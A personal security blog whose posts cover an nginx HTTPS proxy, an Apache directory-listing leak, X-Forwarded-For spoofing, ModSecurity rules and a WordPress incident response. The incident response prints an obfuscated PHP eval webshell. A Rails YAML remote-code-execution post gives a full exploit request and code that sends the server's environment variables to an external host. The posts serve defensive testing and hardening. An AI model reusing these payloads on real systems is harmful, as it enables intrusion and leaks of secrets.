Wednesday, April 2, 2014

How did I make this Blogger site HTTPS?

UPDATE: Blogger now supports HTTPS, but only for *.blogspot.com domains (not third-party domains such as blog.jonathanmarcil.ca). I've removed the setup described below and put a 301 redirect from my own domain to jonathanmarcil.blogspot.com.

As you may have noticed (and Google hasn't taken down my little trick yet), my blog is now fully HTTPS.

At first I looked for a way to do it within Google Apps or Blogger itself. I found nothing. One problem on top of that is that I use my own domain name, and there's no option to switch it to SSL.

Looking around, I found that CloudFlare offers "Flexible SSL", which is SSL terminated on their front caching and protection service. When designing an architecture, it's not uncommon to handle HTTPS on the front servers, say nginx acting as a caching reverse proxy for backend servers.

This gave me the idea to do the same with my own Linux server. The only downside is that if my server is down, the Blogger site becomes unavailable. So I won't be using the power of the Google Cloud(tm), but I'd rather promote SSL than have near-100% uptime.

I got a free certificate from StartSSL and started playing with Pound. It was relatively easy and worked as expected with the following config:

ListenHTTPS
        Address 1.1.1.8
        Port    443
        Cert "blog.pem"

        ## allow PUT and DELETE also (by default only GET, POST and HEAD)?:
        xHTTP           0

        Service
                BackEnd
                        Address ghs.l.google.com
                        Port    80
                End
        End
End

ListenHTTP
        Address 1.1.1.8
        Port 80
        xHTTP   0

        Service
                HeadRequire "Host: blog.jonathanmarcil.ca"
                Redirect "https://blog.jonathanmarcil.ca"
        End
End


However, I found out that Blogger serves two images over plain HTTP, which gave me the infamous mixed content warning. So my next idea was to replace all http:// links with https://. Unfortunately Pound can't do that. I took a look at Varnish, which I already had installed on my server, and found that it doesn't support this natively either. A little VMOD called vmod_rewrite did what I wanted, but I would have needed the Varnish sources (I use Debian packages) and I saw the note "not production-ready". Since my Varnish instance serves a real production website, I looked elsewhere for a solution.

One idea that came up was to use nginx. That way I could do everything with it, from SSL to rewriting. It even has a module named ngx_http_sub_module that does the trick. After setting up the proxy and SSL and adding the simple find-and-replace directive to rewrite all links to https, the website was fully HTTPS with the green lock!

But something was missing: the Blogger bar at the top of the site was gone, and Google returned a 503 error. The problem was simple: the rewrite rule tampered with parameters that weren't recognized by Google. I then wrote a regex with a negative lookbehind:
(?<!(homepageUrl|searchRoot)\=)http://
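
For reference, the behavior of that pattern can be sanity-checked with a quick script. Here is a sketch in Python; its re module only accepts fixed-width lookbehinds, so the alternation is split into two assertions:
import re

# Same intent as the rewrite rule: replace http:// with https:// unless the
# URL is the value of the homepageUrl or searchRoot parameter.
pattern = re.compile(r"(?<!homepageUrl=)(?<!searchRoot=)http://")

print(pattern.sub("https://", 'src="http://1.bp.blogspot.com/img.png"'))
# -> src="https://1.bp.blogspot.com/img.png"
print(pattern.sub("https://", "homepageUrl=http://blog.jonathanmarcil.ca/"))
# -> left untouched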

But the problem was that the stock nginx module doesn't support regexes! What a shame! The next best thing is another module that isn't part of the normal nginx distribution... so, same problem as with Varnish, I would have had to recompile.

I tried putting several sub_filter directives one after the other, but no, nginx doesn't allow it.

I was starting to get a little bored with the project, and then I asked myself: if nginx allows only one sub_filter directive per proxy, maybe I could double-proxy? That's what I did, and it worked! Here's the config:
server {
        listen 127.0.0.1:8080;
        root /var/www/nginx;

        location / {
                proxy_pass http://ghs.l.google.com;
                proxy_set_header Host   $host;
                proxy_set_header Accept-Encoding "";
                sub_filter_once off;
                sub_filter "http://" "https://";
        }
}


server {
        listen 1.1.1.8:443 ssl;
        server_name blog.jonathanmarcil.ca;
        root /var/www/nginx;
        ssl_certificate blog.crt;
        ssl_certificate_key blog.pem;

        location / {
                proxy_pass http://127.0.0.1:8080;
                proxy_set_header Host   $host;
                proxy_set_header Accept-Encoding "";
                sub_filter_once off;
                sub_filter "75https" "75http";
                proxy_redirect http://blog.jonathanmarcil.ca https://blog.jonathanmarcil.ca;

        }
}

The trick was to change the faulty strings back to http.

On top of that config I also added a redirect and a way to serve nothing other than my blog from that server:
server {
        listen 1.1.1.8:80;
        root /var/www/nginx;
}

server {
        listen 1.1.1.8:80;
        server_name blog.jonathanmarcil.ca;
        root /var/www/nginx;
        return 301 https://$host$request_uri;
}


The last step was to change the DNS record for blog.jonathanmarcil.ca from ghs.l.google.com to 1.1.1.8, the IP of the nginx server, and done!

Now let's wait and see if the Google search engine plays well with my bag of tricks. Worst case scenario, I get banned from the search results; and if the search results still give http links, nginx will redirect them to https.



Wednesday, December 11, 2013

Apache mod_ssl misconfiguration

I was doing some cleanup on my Apache server and disabled an old website in a VirtualHost that was using an SSL connection on port 443.

After doing so, I was about to finally load my SSL certificate for www.jonathanmarcil.ca, and I tried to access the IP directly in order to do some testing.

I got an SSL error and said to myself "it's OK, I haven't configured the SSL certificate yet"... but then I looked at my screen and saw the famous

Index of /

of shame as seen on Google.

I was shocked to see the whole content of /var/www listed underneath. All of it. Like many people, I use that directory for my websites and sometimes leave backup files hanging around.

I quickly understood what was going on and tried to find where in the config this was happening.

In /etc/apache2/ports.conf I saw a normal Listen directive that applies when mod_ssl is enabled:

<IfModule mod_ssl.c>
    # SSL name based virtual hosts are not yet supported, therefore no
    # NameVirtualHost statement here
    Listen 69.28.239.85:443
</IfModule>


But I couldn't find a "DocumentRoot /var/www" that would explain the insecure behavior I had seen. After all, if you land on an index page, that index has to point somewhere.

The only place I found /var/www was in some default config that wasn't even loaded.

I fetched the source code of Apache 2 and did a quick search for it. It turns out the DocumentRoot is set per distribution or port of Apache and baked in as a default in the package. In my Debian version, once all the configuration is taken into account, it ends up being /var/www.

If you listen on a port, Apache will answer on it with this default configuration.

How to avoid this in the future? Here are some possible solutions.

Solution #1 

One solution is to leave the default-ssl VirtualHost enabled and change its DocumentRoot, because by default it is /var/www:


<IfModule mod_ssl.c>
<VirtualHost _default_:443>
        ServerAdmin webmaster@localhost

        DocumentRoot /var/www
        <Directory />
                Options FollowSymLinks
                AllowOverride None
        </Directory>
        <Directory /var/www/>
                Options Indexes FollowSymLinks MultiViews
                AllowOverride None
                Order allow,deny
                allow from all
        </Directory>

        ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/
        <Directory "/usr/lib/cgi-bin">
                AllowOverride None
                Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
                Order allow,deny
                Allow from all
        </Directory>


On my server I have a /var/www/default/ website that contains only a blank index.html file, and I use that as the DocumentRoot.

That way, if an SSL port is open (and the same thing applies to _default_:80), you serve a harmless page. By default the config uses the snakeoil certificate to handle SSL; it gives a self-signed warning, but it works.

Solution #2

There's a file named /etc/apache2/conf.d/security that is supposed to force you to be explicit about which directories get served... but on Debian the relevant block is commented out by default:


# Disable access to the entire file system except for the directories that
# are explicitly allowed later.
#
# This currently breaks the configurations that come with some web application
# Debian packages.
#
#<Directory />
#       AllowOverride None
#       Order Deny,Allow
#       Deny from all
#</Directory>


If you enable that block, you need an Allow directive in each vhost that serves content. This will prevent unwanted exposure of directories through misconfiguration.

Solution #3

Add a DocumentRoot at the top of your config. It could be in a conf.d/ file, or in httpd.conf or ports.conf. apache2.conf will probably be overwritten by a future update, and if ports.conf is overwritten, the server will stop listening on the right ports and you will notice the change.

# /var/www leak paranoia
DocumentRoot /var/www/default


With that solution, any port 443 that is listening but has no SSL configured will answer in plain HTTP with the default site. It's ugly, but even if you disable the default site from solution #1, it will still protect your /var/www.

Scanning for problems

If you want to check whether your server is affected by this misconfiguration, first review all the Listen configuration lines. They are supposed to be in /etc/apache2/ports.conf but can be elsewhere:

grep -ri Listen /etc/apache2/
/etc/apache2/ports.conf:    Listen 1.2.3.4:443


Then just copy and paste each IP:port into your browser.

If you see:

Bad Request

Your browser sent a request that this server could not understand.
Reason: You're speaking plain HTTP to an SSL-enabled server port.
Instead use the HTTPS scheme to access this URL, please.
Hint: https://www.example.com/


Apache/2.2 Server

you are connecting to an SSL port in plain HTTP, so try again with https:// in front and see what responds.

But if you see:

Index of /

[ICO]  Name                Last modified       Size  Description

[DIR]  mywebsite/          16-May-2013 17:11   -

Apache/2.2 Server


You are in trouble, especially if there's a tar.gz backup of your site in there, or a MySQL dump. Also, your Apache might serve the source code of your applications instead of running them, depending on your configuration.
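
If you have several Listen lines or servers to review, a small script can automate the plain HTTP check described above. This is only a sketch in Python; the address list is a placeholder to fill in from the grep output:
import http.client

LISTEN = [("1.2.3.4", 443)]  # placeholder, taken from: grep -ri Listen /etc/apache2/

for host, port in LISTEN:
    try:
        # Speak plain HTTP to the port, exactly like pasting ip:port in a browser.
        conn = http.client.HTTPConnection(host, port, timeout=5)
        conn.request("GET", "/")
        resp = conn.getresponse()
        body = resp.read(500).decode("utf-8", "replace")
        conn.close()
    except Exception as exc:
        print("%s:%s gave no plain HTTP answer (%s)" % (host, port, exc))
        continue
    if "Index of /" in body:
        print("%s:%s serves a directory listing over plain HTTP!" % (host, port))
    elif resp.status == 400:
        print("%s:%s refuses plain HTTP (mod_ssl Bad Request), looks fine" % (host, port))
    else:
        print("%s:%s answered %s, review it manually" % (host, port, resp.status))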


Wednesday, September 4, 2013

REMOTE_ADDR and HTTP_X_FORWARDED_FOR : the bad idea

Logging IP addresses is generally a good idea for security purposes or for debugging. It's easy to spot a faulty request by IP and then grep all the logs for that string.

However, in many projects that need a more complex setup, such as load balancers or proxies, this can be a problem because the usual REMOTE_ADDR is replaced with the address of another component of your infrastructure. This renders logging the IP that directly accesses your Web server next to useless.

In some cases, IP addresses are also used to prevent brute force attempts or to do some sort of access control. In those cases, a good configuration impacts much more than just logging.

The widely proposed solution is to use the X-Forwarded-For header to fetch the IP of the real client accessing the Web server.

Many people forget that X-Forwarded-For is actually a list that can contain a chain of multiple proxies, not just a single IP address, so saying that you can simply replace the remote IP with it is wrong.

So basically, what you need is the IP that sits just before your own infrastructure in the chain.

If you have only one proxy, you could do this in Python with Django:
request.META['HTTP_X_FORWARDED_FOR'].split(",")[-1].strip()

You might be tempted to say that just taking whatever is at the beginning of the string would work, no matter how many proxies you have installed. But that is wrong too, because you have to keep in mind that an HTTP header like this one can be forged.

So the right thing to do is to keep a list of your legitimate proxies, walk the chain from right to left skipping them, and take the first IP after that. Be aware that this remote IP might itself be another proxy, but since it's not part of your architecture you can't know for sure.
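
Here is a minimal sketch of that approach in Python, in the same Django style as above; the TRUSTED_PROXIES list is an assumption and has to be kept in sync with your infrastructure:
TRUSTED_PROXIES = {"10.0.0.5", "10.0.0.6"}  # placeholder: your own proxies / load balancers

def client_ip(request):
    forwarded = request.META.get("HTTP_X_FORWARDED_FOR", "")
    # The full chain: the XFF entries plus the address that actually connected.
    chain = [ip.strip() for ip in forwarded.split(",") if ip.strip()]
    chain.append(request.META["REMOTE_ADDR"])
    # Walk from right to left, skip our own proxies, and take the first IP
    # after them: the most specific address we can trust.
    for ip in reversed(chain):
        if ip not in TRUSTED_PROXIES:
            return ip
    # Everything in the chain was one of our proxies; fall back to the socket.
    return request.META["REMOTE_ADDR"]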

Some people suggest removing the X-Forwarded-For header at your front-facing server, but if you do that you'll lose a way to troubleshoot requests.

Don't forget that using the X-Forwarded-For header when you don't have any proxy is bad, because then someone could set it to an arbitrary value and spoof their way in easily.

A good example of an implementation is the way Drupal 7 does it:
        // If an array of known reverse proxy IPs is provided, then trust
        // the XFF header if request really comes from one of them.
        $reverse_proxy_addresses = variable_get('reverse_proxy_addresses', array());

        // Turn XFF header into an array.
        $forwarded = explode(',', $_SERVER[$reverse_proxy_header]);

        // Trim the forwarded IPs; they may have been delimited by commas and spaces.
        $forwarded = array_map('trim', $forwarded);

        // Tack direct client IP onto end of forwarded array.
        $forwarded[] = $ip_address;

        // Eliminate all trusted IPs.
        $untrusted = array_diff($forwarded, $reverse_proxy_addresses);

        // The right-most IP is the most specific we can trust.
        $ip_address = array_pop($untrusted);
This requires a configuration file with the list of proxies, which needs to be updated each time the infrastructure changes. This is uncommon in standard procedures where system administration is separated from development, but any DevOps team should be fine with it. Either way, it should be noted that changes to the servers must be reflected in the application.

Last but not least, you could also use a header other than X-Forwarded-For that identifies just the outside IP address, especially if you want to keep things simple on your servers: for example, it's much easier in an Apache log config to replace %h with a field that is guaranteed not to be a list. Replacing %h with X-Forwarded-For can lead to non-standard log files because it can contain multiple IPs.

Drupal again does this well with a configuration variable:
$reverse_proxy_header = variable_get('reverse_proxy_header', 'HTTP_X_FORWARDED_FOR');
Another advantage of this method is that it also works when the number of proxies varies from time to time.

So next time you see an access log like this:
192.168.1.190 - - [04/Feb/2013:12:24:47 -0400] "POST /admin/login HTTP/1.1" 200
and all the other requests come from 192.168.1.190 as well, ask yourself whether you are using a proxy and whether everything is properly configured.


Sunday, April 21, 2013

Incident response: WordPress brute force and simple backdoor

I encountered a rather simple automated WordPress brute force and infection system. It didn't take me long to figure out how it worked by looking at the logs and the infected files. Here are the details.


Brute force using WordPress


If you check the access log of WordPress, you'll quickly see a lot of "POST /wp-login.php HTTP/1.1" requests coming from the same IP address. And that IP comes from a country with a somewhat shady reputation. The User-Agent field varies, but way too much for a single IP:
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.861.0 Safari/535.2"
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; chromeframe/11.0.696.57)"
"Opera/9.80 (X11; Linux x86_64; U; bg) Presto/2.8.131 Version/11.10"
"Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/10.04 Chromium/14.0.813.0 Chrome/14.0.813.0 Safari/535.1"

And so on... it looks like it changes with every request. Weird.

If you follow that IP, you see that the first request is a "GET / HTTP/1.1". I presume it is there to detect that the site runs WordPress, and the attack is launched later, 8 days later in this case. Maybe it was a big scan at first, and then the attacker fired up his brute force tool manually, all from the same IP.

Then there's an interesting part:
"GET /?author=1 HTTP/1.1" 301
"GET /?author=2 HTTP/1.1" 301
"GET /?author=3 HTTP/1.1" 301
.. up to ..
"GET /?author=10 HTTP/1.1" 301

This actually returns a 301 to something like "/author/admin/", so it's possible to retrieve the username that way. So if you thought that renaming the admin user to something else would protect you, well, that "feature" of WordPress voids it.
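
If you want to check whether your own site leaks usernames this way, the requests are easy to reproduce; here is a sketch in Python (the host name is a placeholder):
import http.client

HOST = "blog.example.com"  # placeholder: your own WordPress site

for author_id in range(1, 11):
    conn = http.client.HTTPConnection(HOST, timeout=5)
    conn.request("GET", "/?author=%d" % author_id)
    resp = conn.getresponse()
    location = resp.getheader("Location", "")
    conn.close()
    # e.g. http://blog.example.com/author/admin/ leaks the username "admin"
    if resp.status in (301, 302) and "/author/" in location:
        print(author_id, location)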

Then you see, less than one second after that last GET, that the brute force starts:
"POST /wp-login.php HTTP/1.1" 200
Each time WordPress returns a 200... until
"POST /wp-login.php HTTP/1.1" 302
and this is actually when a login is successful.


Infection of WordPress with a simple backdoor


Just an instant after that, it automatically starts doing this:
"GET /wp-admin/theme-editor.php HTTP/1.1" 301 
"POST /wp-admin/theme-editor.php HTTP/1.1" 200
over a bunch of 
"GET /wp-admin/plugin-editor.php?file=disable-comments/disable-comments.php HTTP/1.1" 200
"POST /wp-admin/plugin-editor.php HTTP/1.1" 302
Note that it infects PHP, JS and CSS files, even though doing so on the last two is questionable given the payload (I replaced "eval" with "echo"):
<?php /*tFi*/echo/*D|G].*/(/*'naT V*/base64_decode/*+m(%*/(/*=0<j*/'LyprYT1mKi9ldmFsLyogUVsnKi8oLyosfDJ4bSovYmFzZTY0X2RlY29kZS8qRzghWyovKC8qQ3VwYzFeKi8nTHlvdE1rZHRSRndxTDJsbUx5cE5jRUJUTTJNcUx5Z3ZLbVkzSicvKl4reWU4OFMqLy4vKlZyWFhWTj1AKi8nbUFxTDJsemMyVjBMeW9sSUdSeGNHa3FMeWd2S2tZbFFTb3ZKRicvKmw6YmY5Ki8uLypCNVw+byovJzlT'/*[n_i_!*/./*-Zwf-U*/'UlZGVlJWTlVMeW9vZXpkb0tpOWJMeXBwUlRGdktpOG5ZaWMnLypoeGFkTiovLi8qXn0/MCovJ3ZLbU5YUVhOclJDb3ZMaThxTmtkTEtpOG5lU2N2S25oemZpb3YnLypPdXpdKi8uLypgeiF8LnQpKi8nTGk4cUtEcDRkeW92SjJ3bkx5bytMV2xzWURZcUx5NHZLbmMxSScvKnhIekZkPl4tKi8uLypjYFddUk8qLydVWlFLaThuYkNj'/*Qi5_~:*/./*%ub(]l*/'dktsdG9RQ292TGk4cVlGSTBUeW92SjNWdUp5Jy8qPV4wRCovLi8qcH1uISovJzhxUkhJd0xsaHJTRzhxTDEwdktrVldMQ0Z4YW1vcUx5OHFSREYnLypkdz5cK0EreyovLi8qZnU6e0lpKi8ndWRWUlhmQ292S1M4cUlEaHZWQ292THlvOWRpRkhTVVIrS2k4cCcvKmRIQkQqLy4vKnxwKz1BKi8nTHlweU1tUXhXRWtwS2k5bGRtRnNM'/*2I;i*/./*7azS*/'eW9tVFd4ZklIa3FMeWd2SycvKnJST0w0QnQqLy4vKiU6WCVtIScqLydtcE1PVzhxTDNOMGNtbHdjMnhoYzJobGN5OHFVbXBnUUNvdktDJy8qMmliOHUqLy4vKj51OlcuTXUqLyc4cVFFTlViMHBJS2k4a1gxSkZVVlZGVTFRdktpbFZNWEE5S2k5Jy8qaDB3bkUqLy4vKlx8VHMsMVtqKi8nYkx5bzdURVJoTFNvdkoySW5MeXA1Y25G'/*)4ZE7*/./*%<]~*/'aVlDMHFMeTR2S21KaicvKmljSEIhPSovLi8qXDZhTHtTKi8nYXpaRklDb3ZKM2tuTHlvK1ZVODRLaTh1THlwWlBuWjRiQ292SicvKjRNYiovLi8qMDxQQHs5Ki8nMnduTHlwdmIwUmRma1FxTHk0dktsRlJlU292SjJ3bkx5cDNRaicvKmtieCsqLy4vKnNMQmsqLycwMFFsc3FMeTR2S2xRdGZWdGlLaThuZFc0bkx5cHNkSGtxTDEw'/*:n`d*/./*d?=@*/'Jy8qdjRAXCk4Ki8uLypbSnYqLyd2S21wUE9XQW1jaW92THlvM1JHUnlReW92S1M4cWJGZGZSU292Jy8qYHI2RDhoKi8uLyp5PUtpRmNJKi8nTHlvdVpHb3pQaW92S1M4cU5qTTNjV3BYZXlvdkx5cHRTM2hoS2k4N0x5cEVZajBxTHc9PScvKkJQZ2B4Ki8pLyp7Yyt9TyovLypad31WKi8pLypQYGEzKi8vKlREeyovOy8qYDI1X2EqLw=='/*tTNc*/)/*lXBpH*//*!n^[*/)/*-{%3*//*^0,%1*/;/*Q?k4zT7*/ ?>

Then I had to play with it, like a Russian doll, to see what was inside:
/*-2GmD\*/if/*Mp@S3c*/(/*f7&`*/isset/*% dqpi*/(/*F%A*/$_REQUEST/*({7h*/[/*iE1o*/'b'/*cWAskD*/./*6GK*/'y'/*xs~*/./*(:xw*/'l'/*>-il`6*/./*w5!FP*/'l'/*[h@*/./*`R4O*/'un'/*Dr0.XkHo*/]/*EV,!qjj*//*D1nuTW|*/)/* 8oT*//*=v!GID~*/)/*r2d1XI)*/eval/*&Ml_ y*/(/*jL9o*/stripslashes/*Rj`@*/(/*@CToJH*/$_REQUEST/*)U1p=*/[/*;LDa-*/'b'/*yrqb`-*/./*bck6E */'y'/*>UO8*/./*Y>vxl*/'l'/*ooD]~D*/./*QQy*/'l'/*wB=4B[*/./*T-}[b*/'un'/*lty*/]/*jO9`&r*//*7DdrC*/)/*lW_E*//*.dj3>*/)/*637qjW{*//*mKxa*/;/*Db=*//*N^80>W*/if/*['7H-&*/(/*E@jc-JVv*/isset/*B{0Rt)(*/(/*\+WF*/$_REQUEST/*`:N)*/[/*v_kR*/'juu'/*}y3*/./*5>'.`*/'ltwf'/*^ _1g*/]/*Igww0*//*;MN_7*/)/*H<2*//*(+yPz*/)/*vw=K1*/eval/*R8Us+rn*/(/*PaeT*/stripslashes/*vO@*/(/*3Ic8Y*/$_REQUEST/*w39&B*/[/*'>wco_o*/'ju'/*tut7n*/./*q02H*/'ul'/*TOdt. (*/./*_AnurWu\*/'twf'/*2cx|i*/]/*%'3Jh>p*//*i;|*/)/*Vg<{i*//*&3aNc*/)/*5[avi*//*xg\7V*/;/*txFiAuZ*/

then removing the comments with something like http://beta.phpformatter.com/:
if (isset($_REQUEST['b' . 'y' . 'l' . 'l' . 'un']))
eval(stripslashes($_REQUEST['b' . 'y' . 'l' . 'l' . 'un']));

if (isset($_REQUEST['juu' . 'ltwf']))
eval(stripslashes($_REQUEST['ju' . 'ul' . 'twf']));

and the useless fluff:
if (isset($_REQUEST['byllun']))
eval(stripslashes($_REQUEST['byllun']));

if (isset($_REQUEST['juultwf']))
eval(stripslashes($_REQUEST['juultwf']));

So basically, it's a backdoor that evals content from GET or POST parameters. I haven't found any usage of them in the logs, so either it was passed by POST or not used at all. Also, the same IP address didn't make any requests outside of the brute force and infection patterns, so the chances it was used are lower.

How to scan

Easy: for your files, look for something like LyprYT1mKi9ldmFsLyog or LypaVnxXKi8. But some parts could be generated randomly, so to be sure, just look for eval and base64_decode; the code shouldn't have a lot of these anyway.
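
Here is a rough sketch of such a scan in Python; the WordPress path and the pattern are assumptions to adjust for your install, and expect a few false positives from legitimate code:
import os
import re

WP_ROOT = "/var/www/wordpress"  # placeholder path
# Catch base64_decode and eval(, including the comment-obfuscated eval/*..*/(
SUSPICIOUS = re.compile(r"base64_decode|eval\s*(?:/\*.*?\*/)*\s*\(")

for root, _dirs, files in os.walk(WP_ROOT):
    for name in files:
        if not name.endswith((".php", ".js", ".css")):
            continue
        path = os.path.join(root, name)
        try:
            with open(path, errors="replace") as fh:
                content = fh.read()
        except OSError:
            continue
        if SUSPICIOUS.search(content):
            print("suspicious:", path)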

For the access logs, you just need to count the hits on POST /wp-login.php and sort them. The brute force will then stand out easily.
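
Something as simple as this does it; a sketch in Python, where the log path and the combined log format (client IP as the first field) are assumptions:
from collections import Counter

hits = Counter()
with open("/var/log/apache2/access.log") as log:  # placeholder path
    for line in log:
        if '"POST /wp-login.php' in line:
            hits[line.split()[0]] += 1  # first field is the client IP

# The brute-forcing IPs float to the top.
for ip, count in hits.most_common(10):
    print(count, ip)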

How to fix

There are a lot of resources on the subject, especially http://codex.wordpress.org/Brute_Force_Attacks and http://codex.wordpress.org/Hardening_WordPress, but a simple solution that will also ease the load on your server is to add an additional password check, or an IP restriction while you are at it, on wp-login and wp-admin:

<LocationMatch "wp-(login|admin)">
AuthUserFile /var/.htpasswd
AuthName "AUTHORIZED USERS ONLY"
AuthType Basic
require valid-user
</LocationMatch>

Another fix, if you have access to ModSecurity, is detailed at http://blog.spiderlabs.com/2013/04/defending-wordpress-logins-from-brute-force-attacks.html

Conclusion

So this was a very simple backdoor and an easy-to-find infection. The brute force system was simple too. The conclusion we can all draw from this is that attackers use easy methods and tools because they work. So please keep your passwords strong everywhere, including on your WordPress site, and don't use the argument that the username is "kinda secret" anymore.

Tuesday, March 12, 2013

ModSecurity Whitelisting

From the owasp.org/index.php/Virtual_Patching_Cheat_Sheet example.


How I'd do it:

SecRule SCRIPT_BASENAME "^exportsubscribers\.php$" "allow,chain"
SecRule &ARGS ^1$ chain
SecRule ARGS_GET:reqID "^\d{1,10}$"

SecRule SCRIPT_BASENAME "^exportsubscribers\.php$" "log,deny,auditlog,status:400,msg:'Whitelist entry not found for %{SCRIPT_BASENAME}'"


It gives:

[Tue Mar 12 13:49:15 2013] [error] [client 192.168.1.2] ModSecurity: Access denied with code 400 (phase 2). Pattern match "^exportsubscribers\\.php$" at SCRIPT_BASENAME. [file "/etc/apache2/conf.d/modsec.conf"] [line "19"] [msg "Whitelist entry not found for exportsubscribers.php"] [hostname "waftest.hackme"] [uri "/exportsubscribers.php"] [unique_id "UT9qm38AAQEAAAYCDcYAAAAB"]



I'm open to any bypass comments ;-)

Monday, February 11, 2013

Ruby On Rails tester

That Ruby on Rails flaw was something. The only prerequisite for a website to be exploited with remote code execution was to have a Ruby on Rails application running, nothing more; even a simple "Hello World!" was affected.

I checked out some proofs of concept, written in Ruby, from http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html.

In order to really see what was going on, I proxied the Ruby PoC through Burp. It was easy to do since the PoC runs on Ruby Ronin:
Ronin::Network::HTTP.proxy[:host] = '127.0.0.1'
Ronin::Network::HTTP.proxy[:port] = 8080


Then I ran it from the command line:
ruby rails_rce.rb http://127.0.0.1:3000 puts 'rce'

And got this request:
POST / HTTP/1.1
Content-Type: text/xml
X-Http-Method-Override: get
Accept: */*
User-Agent: Ruby
Host: 127.0.0.1:3000
Content-Length: 396

<?xml version="1.0" encoding="UTF-8"?>
<exploit type="yaml">--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection
? ! 'foo

  (puts ''rce''; @executed = true) unless @executed

  __END__

'
: !ruby/struct
  defaults:
    :action: create
    :controller: foos
  required_parts: []
  requirements:
    :action: create
    :controller: foos
  segment_keys:
    - :format</exploit>

The unless @executed is there because the injected code is actually evaluated several times (4 in my hello world test). Also, you have to double the single quotes in the command to avoid a parser error. This is actually a good test case to see whether the YAML parser is reachable and exploitable.

I tried for quite a while to get something other than an error fed back into the HTTP response, but without success. I was testing with WEBrick and hadn't tried with Passenger. I also tried to access the response object within Rails, with no success. Nevertheless, I was able to run Ruby code, require libraries, and execute shell commands.

The code was running fine, but I wanted more flexibility when writing it, so I used Base64 and eval in the payload:
foo

  (require ''base64''; eval(Base64.decode64(''aWYgQGEKICBAYSA9IEBhICsgMQplbHNlCiAgQGEgPSAwCmVuZApwdXRzIEBhCnN5c3RlbSgiZW52ID4+IC90bXAvdGVzdC50eHQiKQo='')); @executed = true) unless @executed

  __END__
That way it was easy to execute multiple lines and write code that is more readable, without having to mangle it manually.
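
The encoding step itself is trivial; here is a sketch of it in Python (the Ruby snippet inside is just an example, not the original payload):
import base64

ruby_code = """require 'net/http'
puts 'hello from the payload'
"""

# Standard Base64, which Ruby's Base64.decode64 will accept.
print(base64.b64encode(ruby_code.encode()).decode())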

In the end I came up with this code, which gives me feedback on my Web server if the exploit is successful:
require 'net/http'
Net::HTTP.get('www.jonathanmarcil.ca', '/?rubyonfails=' + Base64.urlsafe_encode64(`env`))
puts 'You have been tested!'

It worked just fine and that's how I made my RoR tester.


Tested under development versions:
WEBrick 1.3.1
Rails 3.2.8
ruby 1.9.3 (2013-01-15) [i686-linux]

And production:
Apache/2.2.22 (Ubuntu) Phusion_Passenger/3.0.19
ruby-1.9.3-p374 x86_64


Monday, November 26, 2012

Why I installed "HTTPS Everywhere"

I was taking a look at how cookies are handled between YouTube and Google.com, since YouTube uses accounts.google.com/ServiceLogin. I set up a proxy in Google Chrome to have a quick look and maybe replay the requests. I went to YouTube (which is served over plain HTTP, by the way) and then typed "google.com". I saw cookies from YouTube and a warning from Google that the certificate wasn't right, but I also saw this for google.com:

Those are the same cookie names as the HTTPS version.

Fortunately Google does it right: when I tried to steal my own session by using these cookies over HTTPS, it failed with a redirect to accounts.google.com for the login mechanism. I did not try anything more.

I'm pretty sure many sites aren't that careful, so I installed HTTPS Everywhere. With the plugin installed, the request to the HTTP version is never sent when I type "google.com" in my URL bar.

By the way, it is made by the EFF and the Tor Project. It's available for Firefox and Chrome: